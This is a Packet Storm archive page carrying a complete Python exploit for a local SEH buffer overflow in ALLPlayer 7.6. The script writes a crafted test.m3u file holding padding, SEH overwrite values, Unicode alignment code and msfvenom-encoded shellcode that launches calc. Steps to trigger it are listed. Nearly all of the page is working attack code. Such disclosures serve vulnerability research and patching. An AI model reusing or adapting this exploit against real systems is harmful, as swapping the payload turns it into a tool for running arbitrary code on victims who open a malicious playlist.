exploit the possibilities

ALLPlayer 7.6 Buffer Overflow

ALLPlayer 7.6 Buffer Overflow
Posted Apr 20, 2020
Authored by Xenofon Vassilakopoulos

ALLPlayer version 7.6 unicode SEH local buffer overflow exploit.

tags | exploit, overflow, local
MD5 | d4dd6ec9d182e4cc7cce633147a8a316

ALLPlayer 7.6 Buffer Overflow

Change Mirror Download


# Exploit Title: ALLPlayer v7.6 Local Buffer Overflow (SEH)(Unicode)
# Version: 7.6
# Date: 20-04-2020
# Exploit Author: Xenofon Vassilakopoulos
# Tested on: Windows 7 Home Premium SP1 x86

# Steps to reproduce :
# 1. generate the test.m3u using this exploit
# 2. open ALLPlayer then go to Open audio file
# 3. load the test.m3u file
# 4. calc

filename = "test.m3u"

junk="A"*301

nseh = "\x61\x6e" # popad align
seh = "\x12\x74" # pop ebx # pop ebp # ret 0x04


align=("\x56" # push esi
"\x6e" # venetian shellcode
"\x58" # pop eax
"\x6e" # venetian shellcode
"\x05\x19\x11" # add eax,0x11001900
"\x6e" # venetian shellcode
"\x2d\x16\x11" # sub eax,0x11001600
"\x6e" # venetian shellcode
"\x50" # push eax
"\x6e" # venetian shellcode
"\xc3" # retn
)

nop="\x90"*45

# msfvenom -p windows/exec CMD=calc -e x86/unicode_mixed BufferRegister=EAX -f python
shellcode= b""
shellcode+= b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
shellcode+= b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
shellcode+= b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
shellcode+= b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
shellcode+= b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
shellcode+= b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
shellcode+= b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
shellcode+= b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
shellcode+= b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
shellcode+= b"\x47\x42\x39\x75\x34\x4a\x42\x79\x6c\x69\x58\x62\x62"
shellcode+= b"\x49\x70\x69\x70\x4d\x30\x71\x50\x63\x59\x48\x65\x6e"
shellcode+= b"\x51\x57\x50\x52\x44\x54\x4b\x32\x30\x6e\x50\x54\x4b"
shellcode+= b"\x72\x32\x6a\x6c\x54\x4b\x70\x52\x6d\x44\x72\x6b\x61"
shellcode+= b"\x62\x6f\x38\x4a\x6f\x45\x67\x4e\x6a\x6d\x56\x4d\x61"
shellcode+= b"\x69\x6f\x34\x6c\x4f\x4c\x51\x51\x53\x4c\x79\x72\x4c"
shellcode+= b"\x6c\x6d\x50\x66\x61\x58\x4f\x4c\x4d\x59\x71\x67\x57"
shellcode+= b"\x38\x62\x39\x62\x62\x32\x6e\x77\x74\x4b\x4e\x72\x4c"
shellcode+= b"\x50\x34\x4b\x50\x4a\x4f\x4c\x72\x6b\x30\x4c\x4e\x31"
shellcode+= b"\x51\x68\x38\x63\x61\x38\x79\x71\x36\x71\x70\x51\x62"
shellcode+= b"\x6b\x71\x49\x6b\x70\x69\x71\x66\x73\x54\x4b\x31\x39"
shellcode+= b"\x6c\x58\x37\x73\x6e\x5a\x6e\x69\x32\x6b\x6e\x54\x64"
shellcode+= b"\x4b\x5a\x61\x59\x46\x50\x31\x49\x6f\x74\x6c\x69\x31"
shellcode+= b"\x48\x4f\x6a\x6d\x7a\x61\x59\x37\x70\x38\x59\x50\x61"
shellcode+= b"\x65\x4a\x56\x4c\x43\x71\x6d\x4c\x38\x6d\x6b\x43\x4d"
shellcode+= b"\x4f\x34\x42\x55\x67\x74\x31\x48\x44\x4b\x32\x38\x4c"
shellcode+= b"\x64\x6b\x51\x5a\x33\x61\x56\x62\x6b\x6c\x4c\x6e\x6b"
shellcode+= b"\x44\x4b\x6f\x68\x4b\x6c\x7a\x61\x6a\x33\x64\x4b\x6b"
shellcode+= b"\x54\x52\x6b\x49\x71\x36\x70\x42\x69\x4e\x64\x6b\x74"
shellcode+= b"\x6f\x34\x6f\x6b\x61\x4b\x51\x51\x72\x39\x4f\x6a\x4f"
shellcode+= b"\x61\x59\x6f\x47\x70\x71\x4f\x4f\x6f\x4e\x7a\x32\x6b"
shellcode+= b"\x6e\x32\x4a\x4b\x52\x6d\x61\x4d\x72\x4a\x6a\x61\x32"
shellcode+= b"\x6d\x42\x65\x75\x62\x49\x70\x79\x70\x4b\x50\x62\x30"
shellcode+= b"\x52\x48\x4d\x61\x72\x6b\x42\x4f\x35\x37\x49\x6f\x4a"
shellcode+= b"\x35\x37\x4b\x6c\x30\x64\x75\x53\x72\x61\x46\x31\x58"
shellcode+= b"\x45\x56\x56\x35\x45\x6d\x33\x6d\x49\x6f\x59\x45\x4f"
shellcode+= b"\x4c\x59\x76\x73\x4c\x6a\x6a\x75\x30\x69\x6b\x47\x70"
shellcode+= b"\x30\x75\x7a\x65\x35\x6b\x4e\x67\x7a\x73\x50\x72\x52"
shellcode+= b"\x4f\x6f\x7a\x69\x70\x30\x53\x49\x6f\x6a\x35\x51\x53"
shellcode+= b"\x70\x61\x32\x4c\x6f\x73\x49\x70\x41\x41"

payload=junk+nseh+seh+align+nop+shellcode

fill="D"*(5000-len(payload))

payload+=fill
f=open(filename,"wb")
f.write('http://'+payload)
print "\nFile created with %d bytes" % len(payload)
f.close()
Login or Register to add favorites

File Archive:

May 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    14 Files
  • 2
    May 2nd
    3 Files
  • 3
    May 3rd
    1 Files
  • 4
    May 4th
    18 Files
  • 5
    May 5th
    15 Files
  • 6
    May 6th
    21 Files
  • 7
    May 7th
    15 Files
  • 8
    May 8th
    19 Files
  • 9
    May 9th
    1 Files
  • 10
    May 10th
    2 Files
  • 11
    May 11th
    18 Files
  • 12
    May 12th
    39 Files
  • 13
    May 13th
    15 Files
  • 14
    May 14th
    17 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    2 Files
  • 17
    May 17th
    2 Files
  • 18
    May 18th
    15 Files
  • 19
    May 19th
    21 Files
  • 20
    May 20th
    15 Files
  • 21
    May 21st
    15 Files
  • 22
    May 22nd
    6 Files
  • 23
    May 23rd
    1 Files
  • 24
    May 24th
    1 Files
  • 25
    May 25th
    2 Files
  • 26
    May 26th
    23 Files
  • 27
    May 27th
    13 Files
  • 28
    May 28th
    18 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close